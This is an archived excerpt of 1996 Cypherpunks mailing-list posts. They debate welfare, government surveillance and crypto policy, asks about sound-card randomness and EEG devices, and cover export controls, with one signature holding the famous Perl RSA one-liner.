
[more snipped]

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Wed, 27 Nov 1996 13:04:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: NYC area Cpunks  Meeting?
Message-ID: <3.0.32.19961127155830.00688ce8@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

NYC area Cpunk's,

I have obtained a meeting place on the upper west side of Manhattan.
It is available on Tuesday or Thursday 12/17 or 12/19.
What would be your interest in a meeting (party?).
Ideas & suggestions for agenda-speaker-entertainment?

Season's Greetings to all,
Marc
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMpyrGGeikzgqLB7pAQE2xwQAyVipF2GeVLQCW2MYhfnWt0RSMb+jiSAX
G9ufnekOv2Y54lpXX0rctpbjQ81bCZx4rpWfEzhnogteKhqx/DBYEH/2WCShmZW/
kk2ahsLcep30sBm3c6T3P0tN1qyi3hYHYZCOpK5ptkI1OGjX9FtGDrWSdY5lyWBT
RGIxqzpZtBw=
=fFNa
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <olbon@ix.netcom.com>
Date: Wed, 27 Nov 1996 13:10:14 -0800 (PST)
To: Dave Kinchlea <security@kinch.ark.com>
Subject: Re: wealth and property rights
Message-ID: <1.5.4.32.19961127210637.006e33c4@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:46 PM 11/27/96 -0800, Dave Kinchlea <security@kinch.ark.com> wrote:
>On Wed, 27 Nov 1996, Clay Olbon II wrote:
>> 
>> The average welfare benefit (including food stamps, medicaid, and all the
>> other myriad programs) is $10/hr.  Compare to a minimum wage of $5/hr.
>> Offer most welfare recipients a minimum wage job and they will laugh in your
>> face.  (In fact, here in Michigan most employers are already paying several
>> $$ above minimum wage, and often these jobs are unfilled).
>
>I am not in a position to argue with you, I simply don't have the facts.
>My question is, do You? can you cite where this figure came from, it
>sounds like Republican rhetoric to me. Of course, I will point out, that
>minimum wage is simply not enough to feed a family. It is (or at least
>it should be) reserved for single folks just starting out.

Can't give you the exact date, but it was an article in our local paper (The
Detroit News).  The $10 figure is not exact, as the actual number varies
from state to state, I remember that number as being about average.
 
>> >> More bullshit.  You don't know what anyones motives are.  To ascribe your
>> >> motivations to Bill Gates is unrealistic.  
>> >
>> >But you claim to know the motives of those on welfare: pot->kettle->black
>> 
>> I don't claim to know the motives.  I am examining empirical evidence.  As
>
>Sure you do: "economic decision to do nothing and go on welfare vs.
>going to work". It seems to me that you are claiming their motives are
>econmic, is there some other way we should read that sentence?

You got me there :-)

>It takes an awful lot to prove a causal relationship, empirical evidence
>notwithstanding. You haven't made your case, as far as I am concerned
>(not that you need to convince me), there are a myriad of other factors
>involved. I have no doubt that given two (or three) poor choices, most
>will choose the lesser evil and that *may* mean choosing welfare over
>working, but I seriously doubt that this is anything but a small
>minority of the cases of people who are actually using the system.
>
>You suggest that what ought to be done is give less welfare. If your
>thesis is correct, I suggest that better paying jobs is the real answer
>(assuming you agree that minimum wage is too little for most to live
>on). Shrinking welfare payouts may serve to get people off welfare but
>it won't make it any easier to live on low wages. We DO have a duty to
>help our neighbours, do we not? Or has greed taken over entirely?

I don't mind helping my neighbors.  Of course, they live next door and I
know them!  The problem is that the welfare creates a system where behaviour
that is generally bad for society is subsidized.  The incentives are all
wrong.  And no, I don't think the minimum wage should be increased either.
Increasing the minimum wage at a time when you are pushing people off of
welfare is the wrong action, because it decreases the number of jobs
available.  

        Clay
*******************************************************
Clay Olbon			    olbon@ix.netcom.com
engineer, programmer, statistitian, etc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jaltarri@lix.intercom.es (josep)
Date: Wed, 27 Nov 1996 07:05:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <v02140b00aec20a12e611@[194.179.122.140]>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cypherpunks jaltarri@lix.intercom.es






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Wed, 27 Nov 1996 15:02:28 -0800 (PST)
To: sfnf9uy@scfn.thpl.lib.fl.us>
Subject: Re: PO-2 Brain wave meters.
Message-ID: <199611272301.RAA18971@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


> Subject:       PO-2 Brain wave meters.

Have not heard of them.  Doubt they exist in any end-user, commercial 
product.  Take it from someone who has gone through fun 
Electro-encephelagrams (EEG) before.  You don't want to.


> Has NE1 heard of these things? Supposedly you plug it into your printer
> port and it shows you your brain waves so you can try to reach "alpha"
> waves or something. I think they cost around $500.
> If it`s for real you could do some neat things with it; how bout your
> computer waking up when you wake up...
> 	that terminator 2 plot comes closer every day....
> NEway if anybody knows anything about it let`s have it.
>  L8R	-Napalm					SFNF9UY@SCFN.THPL.LIB.FL.US

Matt 
_________________________________________________________________________
Matthew J. Miszewski                 |               <mjmiski@execpc.com>
Practice Crypto Civil Disobedience   |  Export your favorite Cryptosystem
-------------------------------------------------------------------------
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pavel Korensky <pavelk@dator3.anet.cz>
Date: Wed, 27 Nov 1996 07:28:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Sound card as a random number source ??
Message-ID: <199611271529.QAA00236@zenith.dator3.anet.cz>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

when I read about hardware random number generators in this mailing list, I got
one idea. Maybe it sounds crazy, but is it possible to use soundcard
(SoundBlaster for example) as a source for really random numbers ?
What if I connect the input line of the soundcard with some external source of
noise, like FM receiver or Dolby Surround decoder (with built-in white noise
generator) or tape recorder with blank (erased) tape. It is possible to sample
the sound (noise) and use the sampled values as a random numbers ? And how much
random is this source ? 
I tried to find some mentions about this method with altavista, but I didn't
found anything.

Bye PavelK


--
****************************************************************************
*                    Pavel Korensky (pavelk@dator3.anet.cz)                *
*     DATOR3 Ltd., Modranska 1895/17, 143 00 Prague 4, Czech Republic      *
*  PGP key fingerprint: 00 65 5A B3 70 20 F1 54  D3 B3 E4 3E F8 A3 5E 7C   *
****************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 27 Nov 1996 13:49:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Winn Sings on NPR
Message-ID: <v03007846aec26748e7e4@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


As I write this, Winn Schwartau and a guy from RAND are riffing (at great
length) on NPR about InfoWar FUD.

ChingChing!

I love it when that cash register rings...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Wed, 27 Nov 1996 13:52:47 -0800 (PST)
To: mpd@netcom.com (Mike Duvos)
Subject: RE: Counterproductive Dorothy Denning Flames
Message-ID: <9610278491.AA849142344@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) wrote:
>It is perhaps a point in Dr. Denning's favor that her most
>vitriolic detractors can spell neither "Dorothy" nor "fascist".
>
>I must admit that I am at a loss to understand the heat which
>Dorothy Denning generates on the Cypherpunks list
 
It should not surprise you too much, as people have often vilified those they
disagree with. 
 
The more you accept the other person as a human being, the more difficult it
becomes to dismiss their view without first confronting the issues. It's easier
to treat them as an idiot, and then their views becomes idiotic by association.

I know all this, and still I do it.

Ciao,
James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 27 Nov 1996 14:45:16 -0800 (PST)
To: security@kinch.ark.com (Dave Kinchlea)
Subject: Re: wealth and property rights
In-Reply-To: <Pine.LNX.3.95.961127104249.550B-100000@kinch.ark.com>
Message-ID: <199611272302.RAA01129@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Wed, 27 Nov 1996, Clay Olbon II wrote:
> > This is provably bullshit.  Look at the HUGE numbers of people in this
> > country who make the economic decision to do nothing and go on welfare vs.
> > going to work.  Examine carefully the economic performance of the US vs the
> I don't know how much people get on welfare in your country but I
> suspect that it is even less than in this country (Canada). Anyone who
> truly believes that people make the `economic decision to do nothing and
> go on welfare vs. going to work' has, in my opinion, no &^%* idea what

     If you think that most people on welfare live _purely_ off welfare 
then you are smokin stupid weed. 

> they are talking about. Just try to *live* on a welfare wage for a few
> months to see how silly this thought is. While there may well be a few
> `welfare-moms' (which is not necessarily a bad thing, taking care of
> children is an investment for society), the vast majority of people on

     I would like to formally invite you to come live in my neighborhood 
for a couple weeks and see how these "welfare" moms are "taking care of 
their children". 

 welfare (at least here)  would *much* rather get a decent job and work
> for their money. There are, perhaps, a few people who would rather not
> work for minimum wage (who find it impossible to feed their family on
> that) but I suspect that those folks are few and far between. 

     You are living in a dream world. In most major cities there are NO 
full time minimum wage jobs left, other than waiting tables (which pays 
minimum + tips) Macdonalds starts people at 6 to 6.50 an hour. 

> > More bullshit.  You don't know what anyones motives are.  To ascribe your
> > motivations to Bill Gates is unrealistic.  
> But you claim to know the motives of those on welfare: pot->kettle->black
> Just to be clear, I don't really agree with the original points being
> made, but your views seem just as far off as the ones you are opposing, 
> perhaps further. 

    Speaking of Pot Kettle Black. 

    In the Chicago paper last sunday there were over 30 pages of Help Wanted 
ads. There is a lot of work out there, and there are a lot of agencies who
will help you find work, and train for work. There is no reason why anyone 
needs welfare. Stupid and lazy is not a reason. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 27 Nov 1996 15:51:27 -0800 (PST)
To: jw250@columbia.edu (Jim Wise)
Subject: Re: wealth and property rights
In-Reply-To: <Pine.SUN.3.95L.961127135907.23624C-100000@aloha.cc.columbia.edu>
Message-ID: <199611272312.RAA01152@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Wed, 27 Nov 1996, Clay Olbon II wrote:
> > This is provably bullshit.  Look at the HUGE numbers of people in this
> > country who make the economic decision to do nothing and go on welfare vs.
> > going to work.  Examine carefully the economic performance of the US vs the
> Actually, at the risk of interrupting your little diatribe, the average
> welfare recipient is on the dole for under 4 months.  While we're on the
> subject, I may as well point out that the average welfare recipiant is also
> white, lives in a lower-middle class suburban neighborhood, and has two or
> fewer children, but you'd never know it from watching the pols...

     These people are using welfare as it was intended to be used, and while 
they are the vast majority numbers wise, they probably account for less than
40% of expendatures. 

> At any rate, as I mentioned in my last post, you and I are paying three times
> as much to corporate welfare as to personal welfare...

    Which should be eliminated completely and with as much haste as possible. 

> > tax).  And who would get the money?  Those who are producing nothing, giving
> Yes, your taxes do go to those who are producing nothing, namely a bunch of
> CEOs and wealthy shareholders
 
     Wealthy shareholders may not be producers in the strictest sense of the 
word, but without them (or rather without their capital) many businesses ]
would not have been able to grow or get started. They produce _jobs_ which 
is more that can be said of your average machine-punch operator. 

     CEO's produce decesions(sp?). That is sufficient for the shareholders. 
   

> > Bullshit.  See above.
>You keep using that word...  I do not think it means what you think it means...

    You sure do. 

> > You are extremely idealistic.  Try coming back to reality.  Examine the
> > "test cases" for the policies you advocate (and there are plenty of examples
> > of socialist policies both in this country and others) - and realistically
> The only examples of large-scale socialism we have are in extremely statist
> environemnts.  Statism is brutal and innefficient no matter what economic
> system it pays lip service to.

     Socialism can _only_ exist in an extremely statist enviroment.
 
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Wed, 27 Nov 1996 17:34:00 -0800 (PST)
To: bgrosman@healey.com.au (Benjamin Grosman)
Subject: Re: First Contact
In-Reply-To: <2.2.32.19961128172612.00746164@healey.com.au>
Message-ID: <199611280137.RAA03347@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


I think that the character Data uses either PGP or some
sort of crypto system to lock up the ship's computer.

At least if you spend any reasonable time here in 
cypherpunks, coderpunks, or other crypto related
areas, you should recognise what he uses. 

I have not seen seen it; I am guessing that maybe
they are using something to excite the juices of
us Internet folks.

Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 27 Nov 1996 17:44:53 -0800 (PST)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Hurray! A good example of rational thinking ...
In-Reply-To: <199611280201.UAA04501@mailhub.amaranth.com>
Message-ID: <199611280144.RAA19906@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > It is truly counter-productive to insist on conspiracy theories and
> > anti-government rhetoric.  Sure, there have been conspiracies in the
> > past.  Sure, there have been more than our fair share of atrocities.
>
> > However, the real issues are privacy, security, freedom of speech, and
> > effective policy enforcement.  When we start calling names like "jack
> > booted thugs" and the like, we are sinking to the same low levels that
> > Freeh and (more appropriately) Gorelick use when they cry wolf and
> > foretell futuristic electronic meltdowns.
>
> > More importantly, while the public is cynical and skeptical, it isn't
> > exactly embracing the right-wing militia movements either.  It would
> > be a great disservice to the cause if cypherpunks were, in the minds
> > of the public, tightly associated with the likes of Timothy McVey.

> Not at all. We need more people shouting from the mountain tops at
> what are governments are doing.

I do believe we need to get more visibility on the seriousness of the
issues.  I don't think the average person understands why it was so
hard to conspire against the people before the telecommunications age,
and why it "could" (not necessarily "would") be now.

There is a lot of knowledge to pass on before someone can truly
appreciate the extent of the need for privacy and freedom protections.
While it is bad that the extent of the body of knowledge turns off
most people's willingness to learn, the sheer vastness of the task of
setting up this infrastructure also makes it very difficult for the
NSA or any other agency to become the secret puppet master.

Not that they have not been trying.

But to accuse them of necessarily harboring evil purposes is not only
counter-productive, but most probably incorrect.  Most public sector
servants are not the New World Order loonies that the militia's have
been prepared to fight.  It would be safe to say that the NSA, the CIA
and the FBI are filled with mostly red-blooded Americans with solid
allegiance to the basic principles which you and I cherish.

The questions is, why have 3 branches of government?  Why have
multiple conflicting agencies for any given task or goal?  Why not
just choose a "good guy" once and for all and let him (or her) do the
"right thing"?  It's not that we don't trust him when we first elect
him.  It's a question of what he would do with that power?  And those
that succeed him?

That is why we don't "just trust them".

It's too bad that we can't hold Reagan responsible for Iran-Contra
just because he's presiding over the executive branch at the time.
After all, we expect him to be responsible (whether he knew about it
or not).  Why not drop all these stupid laws that PREVENT the citizens
from suing the government for incompetence?

> We are not as free as we were 10yrs ago. We are not as free as we
> were 100yrs ago. Hell we are not as free as we were under King
> George over 200yrs. ago!!

I seriously doubt you "long" for the King George days.  If you do,
well, we are just not in the same universe.

> The issue of cryptology is only one area of attack on our
> freedoms. Just one small piece in the Big Picture. Below are some of
> the some of the trends we have to look forward to:
>
> National ID's:
> Tracking of movement of all citizens:
> Display of documentation for all Public transport:
> Display of documentation for Employment:
> Electronic Cash:
> Automated Drift-Net Fishing of Phone conversations:
> Federal Thought Crimes:

Have you ever consider the possibility that maybe ... just maybe ...
the government really IS as incompetent as it is reputed to be?

Consider this ...

If you were a know-nothing beaurocrat, how would you run a large
institution?  Top-down?  Probably.  Gather as much info as you can?
Of course.  Require that everyone trust your judgement (a la
"executive priviledge")?  Naturally.  If there were guaranteed
political opposition, no matter what you do, would you just push
for more power/priviledge/money in everything you do?  Damn right!
Especially if you don't know how many of these things you push for
will be won ...

Oh, and there is this minor problem with some of these methods
clashing with the Constitution ...  Oh bother!

I'm simply saying that it natural for the branch of the government
primarily responsible for law enforcement and national security to
care deeply about that side of any issue.  If I were president, I
would play the same political games Clinton is playing.  A president
is not just responsible for the specific free speech of programmers or
specific privacy rights of individuals.  He is responsible for a much
bigger picture.  It just so happens that, in our nation, we value
"individual" liberty much more than anything else (including anybody
else's "big picture").  Therefore, there are a lot of people against
the more obvious methods of invasion of privacy.  But let's face it,
the public just isn't very informed or consistent on the topic; it is
just easily swept up in hysteria.

> I was born a free man, in charge of my destiny, with inalienable
> right endowed by my creator. I will not be made a slave of the state
> but will fight and die a free man.

You were born to your mother and father, who are members of a society
which has long built up imperfect infrastructures for surviving and
thriving on the land which it depends.  If you were alone in the vast
American plains, you can claim you have infinite rights, and no one
would disagree with you.  You, your mother, your father, make
trade-offs everyday on your purest rights versus your practical
rights.  Your purest rights are mostly given lip service, and then
where it matters more, protected by gentlemen's agreements, sometimes
backed by force.  But the right itself is not enforced by any real
means.  It is the threat of punishment that keeps the right from being
violated.

Cryptography is one of those interesting areas where, for once, man
can prove, for all practical purposes, that there is a hard limit
somewhere that he can draw.  More importantly, it is also genuine
protection of a "right", specifically, a right to privacy, which
society previously protected using the old methods (threat of
punishment).

Imagine a line in the sand ... if you cross it, someone shoots you in
the leg.  You can still cross it, but you'll suffer the consequences.
With cryptography, you cannot cross it, no matter what you do.  This
brings into question whether or not it was useful (to you and to
society) to shoot you MOST of the time, but not if you present a good
reason to cross it first.

THIS is the interesting part of all of this.  I don't like to see this
issue drowned out by all the conspiracy talk (which no one on this
list is in any position of proving or fixing unilaterally).

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Wed, 27 Nov 1996 17:45:11 -0800 (PST)
To: sfnf9uy@scfn.thpl.lib.fl.us (Napalm)
Subject: Re: PO-2 Brain wave meters.
In-Reply-To: <Pine.SUN.3.95.961127135855.800A-100000@scfn>
Message-ID: <199611280149.RAA03445@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


> Has NE1 heard of these things? Supposedly you plug it into your printer
> port and it shows you your brain waves so you can try to reach "alpha"
> waves or something. I think they cost around $500.
> If it`s for real you could do some neat things with it; how bout your
> computer waking up when you wake up...
> 	that terminator 2 plot comes closer every day....
> NEway if anybody knows anything about it let`s have it.
>  L8R	-Napalm					SFNF9UY@SCFN.THPL.LIB.FL.US

Yes. I was connected to one when I was about 5 years old. I am 43
now.

My psychiatrist was doing tests on me at that time.

The device was made by a company called Grass Instruments. It was
located at the James Jackson Putman's Childrens' Center, which is
located in Roxbury, which is near Boston, Mass. 

My psychiatrist, who is Dr. Norman Paul, now on the medical school
faculty at Harvard University would know more about it and about 
the company.

Mark Allyn
allyn@allyn.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Wed, 27 Nov 1996 10:34:41 -0800 (PST)
To: Robin Whittle <cypherpunks@toad.com>
Subject: Re: Dorthy Denning is a boot-licking fasicist!!!
In-Reply-To: <199611271154.WAA26338@oznet02.ozemail.com.au>
Message-ID: <9611271834.aa13916@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In message <199611271154.WAA26338@oznet02.ozemail.com.au>, Robin Whittle writes
:
>It may be emotionally satisfying to rail against (what for us may be
>evident as) the wickedness and stupidity of our opponents.

	Indeed, making a habit calling anyone who disagrees with your
stance leads to kneejerk behaviour, like that which is probably behind
key-escrow (and the CDA, but that's not the point).

>If we nod our heads to "Dorthy Denning is a boot-licking fasicist!!!"
>then we too are succumbing to groupthink.

	Good point and a thoughtful post too!

	Derek

Derek Bell  dbell@maths.tcd.ie                | "Donuts - is there _anything_
WWW: http://www.maths.tcd.ie/~dbell/index.html|        they can't do?"
PGPkey: http://www.maths.tcd.ie/~dbell/key.asc|        - Homer Simpson



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAgUBMpyJnlXdSMogwMcZAQE14AP/UC7LfVgaGcXe/ojkq+Ci6p3ZrFEkUI46
VRTeEl8cvTtO5vojlJdY8Xok9bRytiE0jf1XqI7v++ixWauTL4ui4ef3sKYYZZ1L
Ivd14DHviv9C5VKmnehrk5ZSJP1ns7HuA0nK742M09Q1eRXkeVgss4ykTCi1Oafg
122wnIi2BVc=
=+9Wg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Wed, 27 Nov 1996 16:48:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hurray!  A good example of rational thinking ...
In-Reply-To: <199611272000.MAA18790@server1.chromatic.com>
Message-ID: <199611280202.UAA04506@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199611272000.MAA18790@server1.chromatic.com>, on 11/27/96 at 04:00 PM,
   Ernest Hua <hua@chromatic.com> said:


>> From: Robin Whittle
>>
>> > Dorthy Denning is a boot-licking fasicist!!!
>>
>> It may be emotionally satisfying to rail against (what for us may be
>> evident as) the wickedness and stupidity of our opponents.
>> [SNIP]
>> If we nod our heads to "Dorthy Denning is a boot-licking fasicist!!!"
>> then we too are succumbing to groupthink.

>I must commend Robin for a well-said comment.

>It is truly counter-productive to insist on conspiracy theories and
>anti-government rhetoric.  Sure, there have been conspiracies in the
>past.  Sure, there have been more than our fair share of atrocities.

>However, the real issues are privacy, security, freedom of speech, and
>effective policy enforcement.  When we start calling names like "jack
>booted thugs" and the like, we are sinking to the same low levels that
>Freeh and (more appropriately) Gorelick use when they cry wolf and
>foretell futuristic electronic meltdowns.

>More importantly, while the public is cynical and skeptical, it isn't
>exactly embracing the right-wing militia movements either.  It would
>be a great disservice to the cause if cypherpunks were, in the minds
>of the public, tightly associated with the likes of Timothy McVey.

Not at all. We need more people shouting from the mountain tops at what are governments
are doing.

We are not as free as we were 10yrs ago. We are not as free as we were 100yrs ago. Hell we
are not as free as we were under King George over 200yrs. ago!!

The issue of cryptology is only one area of attack on our freedoms. Just one small piece
in the Big Picture. Below are some of the some of the trends we have to look forward to:

National ID's:
- --------------

All citizens will be required to be registered with the state. The state will require any
changes in address.

The administration tried this once already with their failed "health care" plan.

Tracking of movement of all citizens:
- -------------------------------------

Experiments on this is going on right now with cellular phones that transmit location of
cars. (actually the phones just send out a signal and the receivers triangulate on them).

Also "alarm" systems that can be activated by police to transmit location of vehicles.
(same principal as above).

Display of documentation for all Public transport:
- --------------------------------------------------

The Airlines are just a start.

It should be noted that it is only a matter of time before travel permits are required.

Display of documentation for Employment:
- ----------------------------------------

Got to get those nasty Illegals.

hmmm... How long before the right to work is considered a privilege?


Electronic Cash:
- ----------------

Paper & Coin money will be eliminated. Everyone will have their Debit cards in which all
transactions will be recorded. This is currently being done with Credit Cards.

IMHO anonymous e-cash will not survive government control.


Automated Drift-Net Fishing of Phone conversations:
- ---------------------------------------------------

With the continued advance in Voice Recognition the police forces will soon put this
technology to use. A prime example is the Fbi's request for the ability to tap 1% of all
lines. The FBI has nowhere the staff or budget to make use of this many taps. They only
way such a system is feasible is with automated systems searching for key words/phrases.

Federal Thought Crimes:
- -----------------------

Currently certain types of "political incorrect" speach are Illegal.

As distasteful as the word "Niggar" is I don't not consider it a crime to say it
regardless of how offensive it may be. Any while telling dirty jokes in front of one's
secretary may not be polite I don't consider that illegal either. Will doing either of
these will get you nailed on civil rights violations & sexual harassment charges.

Others are treated as illegal even if not formally so.

Bill Clinton after the Oklahoma bombings tried blaming "Rush Limbaugh" for the incident.
Rush's crime?? Being opposed to the political party in power at the time. 


Internet Drift-Net Fishing:
- ---------------------------

Much simpler than the phone lines as everything is already in text (e-mail).


GAK (THE BIG LIE):
- ------------------

In all the Clipper proposals from the government it has always been said that it would be
a voluntary system. This is the BIG LIE. For GAK to have a chance of working it must have
the following qualities:

1) Mandatory.

2) All other forms of encryption must be made illegal.

3) Must be global.

The administration is hard at work on #3 by putting pressure on its trading partners to go
the GAK way. #1 & #2 wouldn't be made public policy until the infrastructure is in place.
The EFF has recovered some documents through the Freedom of Information Act that state
just that (what wasn't blocked out).


Loss of property rights:
- ------------------------

A couple of months ago Bill Clinton by Presidential Order STOLE over 1 million acres of
land. This land contained some of the richest, low sulfur, coal fields in the country. 




Now you criticize me for not playing nice with people who either through deliberate
planning or ignorance aid and abet the above policies?? Sorry but I will not. I am not a
sheep & I will not lay down and be slaughtered.

Now I am not calling for out & out anarchy but neither will I support or condone those who
so blatantly disregard the Constitution, the Bill of Rights, and basic human rights &
dignities.


I was born a free man, in charge of my destiny, with inalienable right endowed by my
creator. I will not be made a slave of the state but will fight and die a free man.


- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
*MR/2 ICE: "Do your parents *know* you are Ramones?" - Ms. Togar

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMpzUI49Co1n+aLhhAQHu2gQAlBbVMGH0DEgPqkvCnkavPEcP12HZXevG
hHmP9EPKOz5ON9E5BdhIYUeiCmQh8qIuG5DTIDAsFjCAsFqZjJfHlRv64RkYZv1Z
RQQsVzJV/tXBP4FzhnOOpfWCzwOgaLVEL+YwxS09O87B693eLBKVtjptD89MUSOl
GagJf8vygzY=
=VdNx
-----END PGP SIGNATURE-----
 
*MR/2 ICE: Win3.1? For fast relief call 800-3-IBM-OS2.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 27 Nov 1996 18:59:54 -0800 (PST)
To: "Phillip M. Hallam-Baker" <hallam@ai.mit.edu>
Subject: Re: IQ and age
In-Reply-To: <01BBDC71.A2A247E0@crecy.ai.mit.edu>
Message-ID: <329CFFB7.E37@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Phillip M. Hallam-Baker wrote:
> >Contrary to popular armchair psychology, there is no significant evidence
> >that IQ and age are inversely related.  In general, however, the older we
> >get, the less we use our brain, and it becomes like a muscle that we no
> >longer use.

> Contrary to popular belief there is no sound evidence for believing many
> of the claims made for IQ tests. IQ measures ones ability to do IQ
> tests and little else.
> They were originally invented as a means of measuring the response of
> mentally defective patients so that their progress under different
> treatment regimes could be compared.
> There is no evidence to support the many claims made that IQ measures
> "innate" intelligence. If you practice IQ tests your score will increase.
> When I was 10 I used to spend each Friday afternoon practicing IQ tests
> for the entry examination to the upper school. My "IQ" increased by
> 30 points over that time, an most of the people in the class managed
> to improve their score by at least 10.

> >The point: Yes, you can improve your brain, and you can take proactive
> >steps to increase your IQ.

> Absolutely, it may not be the best idea if you want to be able to fit
> in socially however. You will then have to leave in a world where
> everyone you meet has a lower IQ.

The biggest influence on IQ are the so-called "engrams" (fears, super-
stitions, anxieties, etc.) planted in your brain early in life.

Some of this can be overcome with mental exercise, and awareness of what
negative influences are holding you back.  Much easier said than done!

IQ as they attempt to measure it can probably be most easily explained
as pattern matching skills. Unfortunately for testing, and although you
can be every bit as intelligent at 70 as at 10, your pattern-matching
skills change and evolve over time, so any given tests will only apply
(more or less) at the age group they are optimized for.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 27 Nov 1996 16:51:02 -0800 (PST)
To: jk@stallion.ee (Jyri Kaljundi)
Subject: Re: Israel crypto restrictions
In-Reply-To: <Pine.GSO.3.95.961125190042.16124A-100000@nebula>
Message-ID: <199611280046.TAA18800@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Jyri Kaljundi wrote:

| The real question is, why can't Checkpoint who manufactures the Firewall-1
| sell DES version in Europe, but only in US and Canada. Elsewhere they use
| a proprietary algorithm called FWZ (48-bit). I have not any analysis done
| on FWZ so I don't think anyone is using it.

	They're listed on NASDAQ (CKP).  This makes them an American
company for purposes of export controls.  (This from an employee of
Checkpoint who I asked that exact question.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 27 Nov 1996 19:39:20 -0800 (PST)
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Your login/password for SafePassage beta
Message-ID: <3.0.32.19961127195023.00714be4@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:27 PM 11/27/96 -0500, Mark O. Aldrich wrote:
>On Wed, 27 Nov 1996, SafePassage Downloader wrote:
>> You can now download SafePassage. You'll need the following login/password:
>> 
>> Login: cypherpunks@toad.com
>> Password: [elided]
>> 
>> Go to http://stronghold.ukweb.com/safepassage/ and select "Download" -- 
>> you'll be prompted for your login/password, after which you'll be able to
>> download the software.   Make sure you keep your login/password
>> private.   Revealing your login/password to anyone is a violation of the
>> license agreement.
>
>Is this to say that you wrote your license agreement with the foolish
>premise that an e-mail address belongs to just one person?  Maybe you need
>to really understand how the Internet works before you write a license
>agreement based on incorrect assumptions and your personal preferences for
